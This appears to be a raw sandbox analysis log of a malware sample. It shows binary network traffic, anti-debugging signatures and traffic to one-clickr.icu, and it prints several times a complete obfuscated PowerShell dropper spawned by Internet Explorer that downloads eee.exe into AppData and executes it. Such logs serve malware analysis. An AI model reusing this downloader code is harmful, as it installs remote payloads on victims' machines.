Cyv·"Ec¼&=ÖqºkiÈmEló¾
Data received ákXR<æ¡ÃˆXþëE†ûʊu¢µZÈî/ #d9@Tò«Ú\=rèpü´f(‹J”ÜRŸ&.Mp-‹¬ß û]éêÕVA YHóÈqøãÉ#˜vBÿP£ÝˆlǪ¸Ó-QÁ(¥ì%‚é ùɀ䯪7f„èÚr°Kò§‘(§yP´÷­Ž‚=ªðÚ¾‰]ÈÜ›¶¥f!A1¶‘-ˆ{ÆþÇÈuF—¾dàÇ¡°Ë³J2öáZÖA^F䐏wÁ7ìûÞ\΅y{Q·¸År.ò³e¦áÌëÎ~Ø[Y`x…Y±š–tËžI“>¬Ù ªŠU#ˆ&ã@M>½õ4ûIr×ôìÞFF÷Y'äC@.‹Yœ¥1řáy×6ei³¯¾!§IuÂCýƬ(„µÄÛÿnyí©íYU%:Uà˜^´ön{ÌÁ%53d²ã,ý?õÚ=z㘲áDä#7sûŠÝ4Žº«ÆʎRê}ÏQˊ*C& Ô ®‘¹„"®FNÚ0ÒãUtŒ§ñýþ6¼¹ý«W¿ jUhº‰Gò&­L*Wo'}›©VÒÕ¯Û+‹–"àÖPĹë›2ŠSáŵh+܀”3ûÝe´ËÝB㋨–¯bhů΍ãßµ}B­‚Ã\uéWÖµ•O £Ü÷^+¹e±3_ïMÈ7Ý ¹&L`YH¬¦ÊEÐÝÇ #mÇç§ìûbV‡Ï½áÕroH%‚lìº&‚Ñr×}Á¼ÓãFñèæÍ'B¢r‚bÚ~ì|lnx–L ¢KmÞ¾ŒÅO°¬Z¸µhm „mîîfÈÁ¥¬J¢©CÂ.òtìÿBëÌæñ«õ±Ô[¡uNrõ+KÓÜûLþ ľù§¨ã×ï¾;ëYìåÿú7{`͵aű Çsì·O¨ÙgÝ~X†œWëÖ)Äoj0öã§c…H)}¦G’1¡øRw÷ÍÀ!=æD[פØÃî’ &¦tý6òÐQKrö¤AÊöÒÍ­êC´Q[ MFÌñJ€ÿ*̶áì0T*û†ÜÅVˆçc@–‡òÑp=sÄ*y]ïU9îUµê¸æ'Íi&T‰ÜáP¾Û¬ôC%6€§<ùš¤»Ö³SûwÉ«¯ÏÏ#ò3óªô«5ÔcAñ½Î^­é˜3ÁÀiZJ7Å.ö¬nŒýtâä›M|öywhBˆ>š¯•_ÿ!H”ÛTüf]¦%VÉú»¸|aÿ˜_ɉL÷4²Â¦’›öR8o͈]©^wÖj4è>‰Ãf'[ä=¿•ÅùxÙ3%aÈr'ÍÅT‘b—%àÛÏ@Â¥_úô…/IœجëÛ¥Ö%;5¤ ÊÓ­Bìiúµ8 Á¹CMɐÅy›ø¨Í0p'2z|][´¶D[}ùl˜ä˜>ôÎÓ¸÷‹ -÷»ñ²w„nÔ»p5B$ hÄn¡DG{“ÛâK„Ö°1<½I_J¼ÝM)û âë¡ßúïÙãx/­:e_Æïœ^䙙t“`êXmˆCS#X!1å‹}¢ÉÒÐ?— G3⻖ÿL8’ôåÎ'f‚Þ—ùñڇ‡±O×3X²˜º/â©Æ6æÚ·‹mô.¤óÿLƒÄ¿Ï®K„³7²<걨~ÜOûÞå$…‰ñóCÕZÙ/ö¦Ûö0L×X7ƒ9áETŸˆÐZ'oígyá>o’Œ‘À2E5!+é»OœGutU+^€P)ØÛ<ÆrvXÖ|K®qÓ×üÕ­®À}(ȓ6³$ Uwܒƒ‘ìüØEÖr¸
Data received ÄÃÌ!êìvlfSN™Ðý߁·ÓÍ8¢²xîÇ]¢>š1ã뢟­‰p\ÿFf؄.OÅ7¿í>KÚÞ+sb&äÖbfsx sÊ\òF¶HJfÙsÿIEj׀ ‹8šGÃ2ߥó@·´¶bŒHdÅïapW!=‚Dûã/rÐT~DŸ½þx¶ÃÕãÊEË[¥bœ¥Æ1DµH¯L=¦¨•Žå7*‰p4Mæ䒤M ‹IÝÍ;RϹâìmDZy œOíAœì$À¥9uÿ97öÂ×ÍɌGMy$Û¤E”fˆ^:®›Ûݤ•N֗ÀÐü&¡0¨bS\òè,ñØ:œØZ…ßZjGÌ|z»'¶–}f©UR–`± +µOÙ'³¾©Ünñš h¥õ1ùöM} Û¢K4ò|lz¤ÐÚü˜•­õñô¥®ÊC^)Ï53Õ :ZšPˆ ö=³Wûïzšæ©µR~¹Çà =œ”wÔÜí±¢SsùÝ&~ÿ™ÍøIÑ.®÷,Må깤Aƒ3¨¯pG^Œ“–ú°œFéS’ý?uˆ¾–ѽAó(ãŽðÖ ¯ýw.¡zü(Üÿ‹Ú¤ØçÿVC”!å$$ôé^J¼Ž{Ây4ŽÁ¾—͐ŽŒû%§*엦ä‡Ô?ÇfoÇ7³e$b¿ãÞWŠ) ŒÆÔHr ÌeÀ/œÁƒè‡eMJ;ª_ÜiNj¡cá Æ×·Ü[†p֐Üîù¬¬}õr,vËP§0Ù†ã7Õao¹Øó³ª^—‚ÖLÜ՜"ˆæU”ÿJýp¾î'M›H%:t>C},X¼jø!tØí.‡³±Ÿä¾¢Íª½F†$&|#g<°íèYÕlƒ`0Š^ÆÛúàCRu õA%Èèã–ÑعO´ª+G‰›°KSÂLi~€E¡b šŒ¢1YZGÅ€„¯7ŠI„Ì\Ro9ÞOÇ5í1äì2×Å%±˂]-Œn_ON˜’|v-ñZžá_Zsµˆ~ ylySwõwh¿?•H2?€Øº^™ ¨£ó7²žÆ¾¾š˜˜‰.¨XÜð èíf+ݍ»n?7sôÐBÌ6ÄkÔm±Œ°ÂûÞi¢§æÞj­;R~€Ø³´*×ß#ºõá (FëPÇñ©ð¸Ÿ¦ÃD&íP†`‡ä3AxZzQçããñiö`n~Íþ I7<µ§öÞ°‡¶v±ÿ^SïMšÔ~pZ ¯V #<Ì:¦üpã1© U‡¼ÊQ¼X2ÈV•°á¿²5dÙè6턞¡ -A”%jO~ŒÃ?‘:¼ÌN´ï!¬¿Ô5 C§Áwä'…²Â›5Ãà͊C3´†Ç¢ ø°aÒY]²… çÖ|¯L)ŒYHöbZ +Ù@ˆØ ŠŠ^)G\ý^[±’óó%ª œ EŸey•qÈPÝM&û ;Ë!™WnZ‘h÷9'Ę݄[t¥o”2ß¾qbÓ+æ~~^L®7vt‚”(Pi´[¦vÂ_Ëïän>pü\+Àq ŒÎ`ðо|#p[Â&ԍԶƒX´0  ½&BFÝåʊØßavT5,ÿ3„¯û€‹Mob¾Ü˓Vë¬Ê÷ÔrßԆ©‹‡µdâ“ü‡Š­võ%ªOØmTE‡ì^^ᆐDÓs#^‘¦tŠÊCxïów·DjþÃâµZ<5K@¡26âOý‡LÓ¶Výә/îÀ¥ük%_8‚ü€ ¯ã?õ„¹i›ªölEŪO¶ž®Hô
Data received DËtäÒHi˜èˆHîIN¹¼èfRñs£ÝŜ‹b«²w$­U™ý_”¦ÃŒîÙÜÛ§Fi~+•íqSáøÓ7ásº§­ñÎ=á 5;%%Èå;íîÃ] \'«í õ xn[ö; ï·Ë¹7yÎz=š‰b”x2âÞí¹ @©*[*¤KãtoP¢k6JßEÌÏóYåπ*x¨Tw$斉MLKkó6bY#‹Eï|[Ë;±kPäƒE¸qâ³Ï‹17¦)§¤ülR}¶†íl“œþ ^H \Ø·—ÄŠ¬¾×PÜV’Ù(Áz"wNzQ*è£Ý†€u㘭ßU æ«FEhŠò¢·µ%Ìn¿¥m\,ýU¯˜È±éÆ0±Å&"D`cGúÔmʪ2ƒ lÆ®™9ð g(O&_ ¸‚:©ó4´P Š¢¯ÁÉipíàÅk{ʧ”‡Ãâ–5)zr<”M‹?fĵûÕàÃu þz׸šÄ´AW~d½xbbírk᪓_λ;¥:ôyzüøQP¤ïÔäIªÐ£ ¾ØÎAÌÓõ0¸û¯ŽR²ÉÌû}+êçAdô(ýÑ¿É6™g žÅHOø#5•ÑÆ'GŠ³ U›ÕÈòõò½Ý–‰g ý1“mv¶Ižp_\£¼Ø*©.øÍ'ýOß@ªW¡HÉÍê&ÊcUùˆ†±f½h¹ ûe-žcGWo»á³%ºtÀ¯ÀÎ¥Ý-2ëĦ®oâÎsž’©{*ˆ™—%(¨8Êr†-–?¹ë‹¯³‚“[fýލe×HO^Û¸m¹?Ù ò”ÝyMû5#ž ՗جlñ’ »ÔâŒN­Rú¥Ø’šç\Ðíûû%>ŽÑwÿWi¹œfzŒc̲#%Zs“H ôhÁ~_~èÇ×[Ö º7 …@4^lɑ¶Þ­1ÂGdo»ƒÆÕ¹Dù.B2#èx{ ër—džMÔB½²â}UlbÉPÐ<çZ. xyCo oèÚ?rûw7ŠÌ‹<! uõ¨2 Xê„ R2ÆÁ¯&gA;^í²Ÿ#(–Ü.»%ν ’éG!« 4cö3V¾ôÒjü²^=•p¿ùE~˜£qÒ¥Òᔇgo$ f,^“å%*€°=q‡‹š O™„;’Ô·ä5ê„Dj†ŽVßÁlÐ89ê£0%ÂÛ6‘T.ž6© FsêÁÊ(ىï1KK©à>QªÔ¦©àÓaô¨!;-úÇ_v$¢¡4ŸyeðvÞµÆé%ùàLW¦†^yhNé”(ºÜÊÌ,EåÙ¾ïl‚ÚYzE8(p¢>2ñœá…—(² þԛ¨pÜÃ(‘äî$mÿØ·–Ló]áp–[ÜÖ0¥5|»ÐqÂÂ/è¯EʅDyJÀ+“~c @ˆoä˜Áó‰ç0h4?û?¿°¦2ô,MñQþ•¬2Zç¾bÝuY¡´€Æ™áø`Hïb]c ¸4ˆ#¡€Ús†Ú,‰oAe4ĺë'·”œšhš‘bnñÁ÷‚,M[ÜßlêWmÅ(ie§w%„l|®‡£å(^]æ êgeЃêÿùæ¬"9Ó>4þfÏCÁ&SlBYˆøË ÷h â4ì>ˆŒøO¯ے²u’ö°ŽÊõ”±àm`rÌ1 uZÿ’Dà6ÅÌ¥ìëŠðõ½vðÕÿw¶-³=|#‚ûƒù/pÆ~1½nÄÅmMۏdå^§úk’PãQ(Ùi i&I˜ ¨,ó&1ý‚†Z »' ¢dhLªd·›I„n\
Data received †lçá± fŸ2€=ôê$”ð5ÎÅUþÍઐå¿RIÌß%µ‹E¢]ž…Ÿ¦vèúl‚Ž%+^+ê‘/ë!FhéC7Š»ZbJ0®òYrÉ凙®g¯€‹+Q9~2”7#ܽ.wf]Þ_}Í8l’!±ä1Nˏ^m¡@w∴Wó½‡Ô3ņûK̖¾×Cs@6¶âÖõWúI{e—%Uç4ÛيöáûÁ•X麓.%ÑÈà.ªÞcK@F¦¥°–šdÖeõ2_µÁíPˆg?ø“߁ÚôõæB nŠ ¯Aã"+¨CõH±Ç‡J:IGã¿iÜY–¾5ãØæÆ×±—œßTžô¼_ß#ŽÂQJ*!Øð¿'oýQÚ(F©}ˆA‚pPqØ%õÆË•ƒéˆÔgÝU¬Vðˆ_úìÂiœáËäŽÏìº'hƒÕä×Î[O$“5˜ÏG+탷Ô2}Ûݽ†7)–SœºXm×¾‚€A % „ø/4¼¬j1Š†D¥¿ªÁ÷|¯7 $ðÒ¬MÐPÖW’q¼a7Ëh1»°‘¬·@~†Ò Ùå¼»ÚC'wdÜ0¶1pïa'C3ÆäÏë<Þz¼‡4L!Ìp+÷£-ÒNTg«Êóʞ_¢ ·çŽûIeo%€õÏ°Û¹·;óæ ©fÍ® .ôO¾z“ùβ%z4eR¥N$>Ù<±4Gw‰£lZž–]W?ބm+°wI)%…eŒÏ‘Û€­@R:æƹu¤£¹e­5ïÞº´ãÍA%ڵӝ å<ü¸ûΑÑp1Ûò1{Eó’Çœ®? Ô³®ÎójS×.“¡ò·ìŽgȅŽYë$v÷ù>u(î×1­/}Þ±‚]FÏÆrהWLM{­5˜—¾û6µëfåùbô;y{>DzÎÖÙæãȵÂ3M/¡'£k£¢.0rGõ…È›Z½@/ƒ¹yҞˆ“sÙÂ'¾%ë†#×þ½çJ*SŽ¡Â¬ ì t'Îޟ¬§…žðkt˜8ü+«†Kƒdt™ùƒ ?‚Žèü˜<Ïö¹EÚüE¦z4ÍÊVTt¤qÅ‰KZs7HG§ oà2‹ËjÌ­ny_¦'JSr&+$KÓFp5° ^ qÚ±«N£pÂÄ:½èÃR¯h/7»&4 y„à¢@2=PÔ|LSböÎô`¡¨I¿EÛjsñ‰k96 hûò%Ù­PkD¤­Ñ¶M§Ika|e?Θ Äòe¨%NΊ”ðz ‘ÃÊS ©úÌdóáöó5ӾDz¸T[Ãé«í?¸(ʼnÚ´"RÌ(‘Ê÷‡&7]4T¦¶o¤º}‹õ­ĉÜ°RU~Bú@&ØG>…J*ݸëPü°@mIM¾üƒ²K:³8ý+T³¶ÑÈ 2Û¾>¶Ù˜±Ý~#®‘§´,<’<å5T¼÷L'­Wʂ¦;*ædaM¶Ê¯[ù+é>Ô6A£g¨ óxLÐ$/ÏqLA—€Å„Úh,¸#ÁZî–@γÐ\Up‰!uŒTTÁ&zŠå'.Øz“pÈxNJ¸½%/š@@`‹ªb|Üïb^Jbî$Û¥_ô.äòðÁ„NG%ØδÀV¥œ¾@cÈ£kÜlt`€ôµp;nq³&¢÷¼Hýƒâ6#³«¬ƒƒN,ÎËõî"½…Þ.Fêd8F™ƒæ6.„3]™ö]L‚)½Ã÷ˬæKO¹× þÁlÎíšÇ'HE¼Èõ?ŠŒn¤Uî*“6Ôl!
Data received sëoxíÒQ}±Úùó•wKDF(móy 0'%€ÚÏEé؄=Úǹu(üåB\›#…FX*VÅÏՒ×ýtpì‚N.¸£cDøÕBF"A(“ã֍è4 d+MfGLè·Ù®Ð´< /ҏ€h»ÌºD¿…²9§ˆ¹ù£MoÀH ÇEŠ7Óóëë¼Ž¦Ø#Ûð–`.×·×W!ÈÒdA&|¤ ¦øG(÷]>#NÔ·Œû,þá›rÔ½+§_8`ÙÎ ò™W€ÄÜcþ³™ÑÖ±†¶Š…V}&¸eX(9âk8[ΣöÈ{o’ Rc>jeIûȗ¬ìÆ¿KfšÕµ¢Ð·Püy}=%Œæ u†©˜ÈsnPßL¡ÄTÜICõÛ7F=Uµ „ºwܛŒ¹‰7N§x‚?ê€.Z>˜þ¬ˆÑñ® <äLì „…Æ¿8Uá"?D½!¿ßA’ßå҂t9›rwÇ8Ù8>|LHo£JâMÁ §"UÂñ&ª È Ø¡D/ҲŊ¨v"‡‰VÊYÑ¡ØÀ’·~˜ÆÀ=n%MŠ¡Ÿy¤<%dzæˆt§%Ž³çžìەqh­ê3ùûr3¹7aeôŒíI}¾%£{’ç6®þj9yìñ%ð¨5#N˜+ƒÔ0·SÛ<Ïà´5,¦9n1oeãªÀG×Ò9à@fò¯¬÷³‡i S-†·œ¢0…¯uò\R¯}Žš´rT×°Ó-r4T[ÎÃÙI­a{òøWytÆÈÕñåºÆs,5„“8¬ÜñèARñ€¸FœC ´bßė DèËÙuƅžÓô.ƒÔkÇö%1ò5_ìm‘d‘[etÏ)Ï××Ñ#×jü›{3,éò)5­Ñ¡­xv+ÛObÙ«´Û®ï8RY7ªÈ6èG1»é|”þéýQÿ»z_Ï9@ÀË9׎[’¯<½ê¢å¸¨_•Ç%›úöH$v4<!fqÄ©…eåR4ÙÙÿ ÷¨¤@#»¥#‰wóþ0j÷…FŽ´7¸·+GCз3r’A«ÖaWí²²o ì$f5P†–©S„/žÍÁ=×I™½ÃQˆH•KûsX·¯)}B”ìÆÙ¯ü<”Ù”ÛV8˜?L¯Ñ?F ÂxY5'OW˨1 4² ¨¹Fz/„×|e•CC6÷A"£7ëP¼ÐRŽ;Yš=…Ïq5› îeëÀÓ¥Ò÷Qƒ9? ‘Š· ÕuËüÎnÃSî«eô/k„Z/L­ƒj’Ç#pÑ|4ÿ×e楀_ÃME×1„›]cB‰«pŸñK4I´T›Ã¦¹/A{t ­×öû &Ù0Ǟ¸Ç: €ˆt%iê/é“"QJñÜÓ |XÇÜ%·Uca,†I!Åә÷™¦V©væDç “Ë²þ҃ yø&]¶K²¿±­œF ™»¦¤f`Ù ‡™¶À3¶é•JB"²ŠZ½Є¢Z;ú'— *³Âo®¯U5€VîퟓԟãÖ5µìó2x'_[çà6Â9„Q½q]Çrù<-zèñ(¸Ž¹Î©Wëßj—*Z ¾š´à¿mW—Úc+Û kÒù;øªœX©Ü÷ý¥mM³?”svŠ¼½me0‡¡°4ŒÈ–ÏC­T-GVÖрLV”“êÇ_h Þɜ_‚a€{¬2aáêœ5‹ü46Xδ®Ð±š|Ët.üG~m ãM÷t”Û&¶:¦4äeä ‹`µÅ«E TŽ*jŞÖ>‘q“¢#E<ò÷σMr'ܺl‘R3Ã'”ÅÄ2oZ
Data received &úÜ{ª‘Ž•d:l,»äÓBWZb#,´×ÖÎÉ>“Bx“ÁÕJ+"øwEÓM‘/Û<fRì~:§Y£–1{˜„«^':,c6f.X;f@p¾JÍЉÈÄÆ|!~ùîûtáßi.òëAÕçÆø&ñ6“y¡~åÀˆ$ 6Ùy˜ŽB£0½kΓõE‡—££ØDÈf6…9]–­Ä{"6¹À…²÷ÉaÒ f(c+¬´›˜Ø_ÓV»pÄ Q¬0Àˤó|¼pe ÐÓ ý);%ôl\Uð.«‡'.¹ŒÛ:[Ç£ÄÓ쫬``GC\„ñ}Ñ͎¹æIÅg;R?êÒb ¬ÄN~b×G.éFr·¡™<ƒÅgnO6¡pÝ¡¡¨)\ë: ÖÎxa¡F‹íš'IT£‘—q%áž×R‹~œ­(́ÛßC\ñ™5›úŸ¾ÇžTw©ä-÷_Å v#¦³OuUÛ8” Ê¡3ª­”îÔm,hW q…ºŒÓù—²ÆšøÕ»ÛY¨zµEðœ2þFÔÁõ?e‹0ÂÀ®ÔқF)é2e»¬=.)¿ oÕîß u,úÇk ž>ÖӘl àžˆú8^]qœ{•T¤‡û'·JèÃifQu!::Ø°k°¾n”š×Ò@Á0ÇÂV2ð7.¢ªnª@‚“&õ ç<Ég``òìl™‡?U¤¦;¢I(¸>¢Z»DŽºùwx.öXµŒ”žÞ \@ S1_³,(vÓøR}g ˆ&‰DÀ6¿]×<Šïi©ðupÈÑ Gý]ÃƧ°ƒ:‹B+Âõ t‘È?nòÑìzkŒ$]ÇÌߔ*%ßaÒ‘s6ó® d ©‹wÀÿ9V7¦¢½Þ}ÿïPZz¶ I/o(‹ê‘DÌqº«dRmF¯EsK½^ D¸Rª3ÉJÙ-ÇËÖvw8¡mâyG†íi²‡E¿£ïäyK.ù#‘°XA¥âyåXÖb5ýÖ÷cT²ó›`$@Jxò-ñ?at·O^ŽHÏkwvL¥3ìÍë,e•ðè(ƒ̝Ÿ—°¼õmËEåϧÀª”KýÀÙY)ùöSµÆ4‡ÀËYn†„ìåùlï4œ;îÛ {”µ^b垘éHdϹÅÿ(¸ý~BÂÆw%V‚¹Œ®}ÖëC(!Zã Æ~9[^ÝÎiËوÉî¡‘Û xê»úÊè'YLƒ³¼횉Û(.i‹Oy‹pk\Sa¿7.Þ+ŸªL÷›/ÃÃlÛVZaIÚÍÌr«<eÀV"‘ÎcàìV$õ2épÝ^ Hùð(5ÈX¬ãsºYôkÔd‚i’äs°~ˆ¨r“ÃÀY qvôDJ‰Ë¼ŒXÎkS•¸t »u˯¹±â;, >mׁt] …‘̈́Ԁ¦ˆŽjC¹‚¢Ê¬Ö1£»‰éÑß]¦º|ã>€u8(ȗå1qKyæòyÆX¶‚_¨@| ‰KIHo)àñE½¼½IM^Púd­Ôqÿ-Þ²£×‚ÔúX£#âÍ{ŎÿQ“£«ÁXɜ™S¨—¨_yº;!ZÚü=µ#-2•Üøä­ök‘mŒ*À:ªŸ:ɉH-†f@„dÇäEwDÇKÜ9 ö¢ÒEÿ¬Vñ˗Ø|û §ÐÒ^íeE!E½MÍí>óÍšÑÝ26C©hõëa–iMD' VV¯ pó[ÓØ©ÕU„Éuæ8©€nµ³Ÿ,ib'=,‡ÐášêÿÅê(ãì„ôÛ̒0„Ú¢]—îRBÃÐ* ¸ô
Data received ©Ž–ð ÅD\¦L¾fR9i—0©ì®Œõ ‹´SmÿK¾ñìä´•¨¢¢ßZÖÇOpf•ÕVÀ…è»ç¥9Ù§ óßyO~‰äQÉ(VeCBŠLM¤ePÍ.¬jB_ØE×Q’mnÌö¸i#w̛»Ú¨žŽw)ª¨€ešù›±½ ÔOHä_‰HÍ«`ðB+’CŸ#€hõEËcЕ:)šùñ§t0ô~;./6gváÙr»Ð“X(ZýŸÃý4Â?î®ÜsʼnëÔòÅHÆ Á$ack²ñÝX²“£Œ 5ºPÂ*ÝÒYŒýˆ‡…UC0YCÀ©a©tS‚Ò!V^éßX‹ÕÎõyyȦûӞ^ÓÝý,"Äy­ ë=Y*)[ž¾k5/;w?§Ø™1¢ý;¿¬XCSî·Âzg1DÉeZĦe“ùV©Ò>ºÊ€Ò8|!y{5q-DÀùr[ÃEQ¼*|%ÍÓâ¬e…p5çäÎ H>ç1„j¯}Óu-ª¨wJøÈä)/¥/°+è .ÜÇ©HÊÈT½vˆ8Õs‚0ݚ˜â7ʶÆ~¢ò¸êÃÉÉ¿šñ o­†Ì$ÓB£ >¤E«>¤ôÃ& ÅÍØUÖ$êä̍Ÿ åšÇ¶þ‚¸äUKVÿ„Z¢z×ÙÌ Ŋ:t}¼ÎJô×ِáŽÞ€6tz­´s–[½Q!szöÈey›|zùàɕùþ-Û%À¾/duÏ"øϋO±ð<`NcßîRoˆ¬º…«°øX&LÖXJ‚µëÍµþK‡P£~>¦usìÍzú‚O'i #‚g6œê¬Ç{³Ú¦—¸½3eU>u14òöä Áï‡¿äRŽ¹ ÊJñ¹þ¼m9âbp»û™ò-úzÇKÓòéx<v¾ÎÇô÷¬ˆ?`«Û$7¯;Óõ}™ÐÍ-£1ç5ŸKÄä…L¯6x×Ó¶*¥‰_Z_^®Ì‚oâ6ª’Üëğ]໬ئ‘xSŸ™P!kÃ_Aœ‰ÊÌ?ë_8Xg2«YµÔ?áǝ³‰üÞ‰z©» ºó i&âÒ¹{k,ßZ­ªm<*T1¯óJpU¨ ä‚Ø­”IÖ¯s«öʺçînå Ù¼Òzåÿ.äҖƒ–öM€¾ùEÌÐáäU[¿å¦è…ﲐcßj##ÿk®ËÓVHåOŸQTîK˜. »EnI—ƒ²¾­Cxëéú ä ,ô4?ºMÿÄqÝÉ_÷ Š9ÄÅ𝂵dçG¯¾h]Ï!Á¤¬UýiG&êãŠÅ ýs»¶ËfÍpþé¬#~žèêädwLëÅËi}æ+㗠°ñ)¼ÎÏà‚±Ã¦P”ÛIƒH"aqE Ywøöuçl5;uâß:ÛÄîlsŖÏy¾*|Áœˆtå.DúÇµ‚mÜεÎ!Wð£šå¢Á^:Ôkó"½»¦.5ÕµEZAÍ>c˜™ÿA —d‚xî?óÙƒ½Ã…ü$Æ;QTŒ/¬kx„Ë=–h¸ûÄ=ÈõÁ{í»f°º8¹ãøä,ºë#œ¾—g÷ûŸ«Új£,ÏÙ¿a¸d½$°†ÿ9±Tï…áÍҊ…Ù!ÍRê´áôRÀa/Õ>Ð@mî>£è-!¶§fí+`¹¤S|g¡¸`Kã ®äù.ÙîékÍ\¼)Hîé„aàەd†< fÆÚì+œŠ@°+N‡íUÌÙB", be®j\;N—@®3<mXOÜa7°AC_ö(Põ>ÏòûØ[Â#:íE(Ì$¼˜‰áî
Data sent ~zeÇE•^#“ù¦´aG&¨:KZuÀþˆt>j§’/5 ÀÀÀ À 289ÿ zyp6be3wyc01.one-clickr.icu  
Data sent FBA/çÂìÅ+’²a8Š‘ePOǜ.Œ^¡·Ù8R7~KÉ{ùùT'"ò†÷“¿%ÉCÆ ò­T¥CŒxdp n0³¦®ŠÕ÷åAаÿÖšúÞî%„ºOâ(虆Å쀃ó¥#WÈ|`é6¶Ç_™t
Data sent p–O„z‡]Þ·JŠNù/Õ+"¥+ÏK²ÈʾæóÚ±6uzñ¼D.yÔìø ›‘ËK0äÄ÷…Å9×"57ӑώ¶™a ö@Ü㆚¶øËs#Úë]öEŽ%ÜÓL• ¤RëhfÊ È)™
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409
host 117.18.232.200
file C:\Users\test22\AppData\Roaming\eee.exe
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted function zJf($Qam, $lyA){[IO.File]::WriteAllBytes($Qam, $lyA)};function TPk($Qam){if($Qam.EndsWith((ANO @(4660,4714,4722,4722))) -eq $True){rundll32.exe $Qam }elseif($Qam.EndsWith((ANO @(4660,4726,4729,4663))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Qam}elseif($Qam.EndsWith((ANO @(4660,4723,4729,4719))) -eq $True){misexec /qn /i $Qam}else{Start-Process $Qam}};function Zbf($iVo){$MvJ = New-Object (ANO @(4692,4715,4730,4660,4701,4715,4712,4681,4722,4719,4715,4724,4730));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lyA = $MvJ.DownloadData($iVo);return $lyA};function ANO($DIw){$DYi=4614;$lSF=$Null;foreach($Mze in $DIw){$lSF+=[char]($Mze-$DYi)};return $lSF};function bID(){$kPn = $env:AppData + '\';;;$mUBIuDwhhjWEPp = $kPn + 'eee.exe'; if (Test-Path -Path $mUBIuDwhhjWEPp){TPk $mUBIuDwhhjWEPp;}Else{ $HgTkSNV = Zbf (ANO @(4718,4730,4730,4726,4729,4672,4661,4661,4736,4735,4726,4668,4712,4715,4665,4733,4735,4713,4662,4663,4660,4725,4724,4715,4659,4713,4722,4719,4713,4721,4728,4660,4719,4713,4731,4661,4715,4715,4715,4660,4715,4734,4715));zJf $mUBIuDwhhjWEPp $HgTkSNV;TPk $mUBIuDwhhjWEPp;};;}bID;
Time & API Arguments Status Return Repeated

send

buffer: ~zeÇE•^#“ù¦´aG&¨:KZuÀþˆt>j§’/5 ÀÀÀ À 289ÿ zyp6be3wyc01.one-clickr.icu  
socket: 1268
sent: 131
1 131 0

send

buffer: FBA/çÂìÅ+’²a8Š‘ePOǜ.Œ^¡·Ù8R7~KÉ{ùùT'"ò†÷“¿%ÉCÆ ò­T¥CŒxdp n0³¦®ŠÕ÷åAаÿÖšúÞî%„ºOâ(虆Å쀃ó¥#WÈ|`é6¶Ç_™t
socket: 1268
sent: 134
1 134 0

send

buffer: p–O„z‡]Þ·JŠNù/Õ+"¥+ÏK²ÈʾæóÚ±6uzñ¼D.yÔìø ›‘ËK0äÄ÷…Å9×"57ӑώ¶™a ö@Ü㆚¶øËs#Úë]öEŽ%ÜÓL• ¤RëhfÊ È)™
socket: 1268
sent: 117
1 117 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\eee.exe"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\eee.exe
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zJf($Qam, $lyA){[IO.File]::WriteAllBytes($Qam, $lyA)};function TPk($Qam){if($Qam.EndsWith((ANO @(4660,4714,4722,4722))) -eq $True){rundll32.exe $Qam }elseif($Qam.EndsWith((ANO @(4660,4726,4729,4663))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Qam}elseif($Qam.EndsWith((ANO @(4660,4723,4729,4719))) -eq $True){misexec /qn /i $Qam}else{Start-Process $Qam}};function Zbf($iVo){$MvJ = New-Object (ANO @(4692,4715,4730,4660,4701,4715,4712,4681,4722,4719,4715,4724,4730));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lyA = $MvJ.DownloadData($iVo);return $lyA};function ANO($DIw){$DYi=4614;$lSF=$Null;foreach($Mze in $DIw){$lSF+=[char]($Mze-$DYi)};return $lSF};function bID(){$kPn = $env:AppData + '\';;;$mUBIuDwhhjWEPp = $kPn + 'eee.exe'; if (Test-Path -Path $mUBIuDwhhjWEPp){TPk $mUBIuDwhhjWEPp;}Else{ $HgTkSNV = Zbf (ANO @(4718,4730,4730,4726,4729,4672,4661,4661,4736,4735,4726,4668,4712,4715,4665,4733,4735,4713,4662,4663,4660,4725,4724,4715,4659,4713,4722,4719,4713,4721,4728,4660,4719,4713,4731,4661,4715,4715,4715,4660,4715,4734,4715));zJf $mUBIuDwhhjWEPp $HgTkSNV;TPk $mUBIuDwhhjWEPp;};;}bID;
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted function zJf($Qam, $lyA){[IO.File]::WriteAllBytes($Qam, $lyA)};function TPk($Qam){if($Qam.EndsWith((ANO @(4660,4714,4722,4722))) -eq $True){rundll32.exe $Qam }elseif($Qam.EndsWith((ANO @(4660,4726,4729,4663))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Qam}elseif($Qam.EndsWith((ANO @(4660,4723,4729,4719))) -eq $True){misexec /qn /i $Qam}else{Start-Process $Qam}};function Zbf($iVo){$MvJ = New-Object (ANO @(4692,4715,4730,4660,4701,4715,4712,4681,4722,4719,4715,4724,4730));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$lyA = $MvJ.DownloadData($iVo);return $lyA};function ANO($DIw){$DYi=4614;$lSF=$Null;foreach($Mze in $DIw){$lSF+=[char]($Mze-$DYi)};return $lSF};function bID(){$kPn = $env:AppData + '\';;;$mUBIuDwhhjWEPp = $kPn + 'eee.exe'; if (Test-Path -Path $mUBIuDwhhjWEPp){TPk $mUBIuDwhhjWEPp;}Else{ $HgTkSNV = Zbf (ANO 